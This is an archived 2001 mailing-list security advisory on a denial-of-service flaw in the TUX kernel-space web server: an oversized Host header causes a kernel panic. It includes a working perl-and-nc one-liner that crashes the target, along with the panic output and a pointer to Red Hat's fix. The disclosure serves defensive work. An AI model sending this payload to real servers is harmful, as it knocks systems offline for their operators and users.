TUX HTTPD Denial of Service Condition ============================= Background: ------------- Tux is a Kernel-Space HTTP server coded for optimal performance (IRQ Affinity,HTTP compression, direct scatter-gather DMA etc.) It is meant to be used as the main HTTP server for static objects with requests for dynamic content being passed to a user-space HTTPD server such as Apache on same box when necessary. Tux is disabled by default. Vulnerability: -------------- It is possible to cause a denial of service condition by submitting an oversized "Host:" header request to the Tux daemon causing an assertion failure and eventual Kernel Panic. A total system reboot is required to return full functionality. For example the following script will cause the target box to crash: perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 . qq(\n)" |nc <ip address> <dest_port> The following output will then generated (edited for brevity): Code: Bad EIP Value. (0)Kernel Panic: Aiee, killing interrupt handler! In interrupt handler - not syncing! To the best of my knowledge this is *not* a buffer overflow (despite apparently being able to overwrite the contents of the EIP register) and as such cannot be utilised to run arbitrary code. FYI The Tux source code contains numerous assertions that are used to safegaurd data integrity and if any of these assertions fail (as it does in this case) code execution is halted by making a call to the BUG() function. System(s) tested: ----------------- RedHat Linux 7.2 , Kernel 2.4.7-10 and 2.4.9-7 running TUX-2.1.0-2. Additional Notes: ----------------- securityat_private where advised of this issue 25 October 2001. Solution: --------- See Security Advisory - RHSA-2001:142-15 http://www.redhat.com/support/errata/RHSA-2001-142.html Thanks: ------- Michael K. Johnston ============================================================================ ===============================
This archive was generated by hypermail 2b30 : Mon Nov 05 2001 - 09:30:48 PST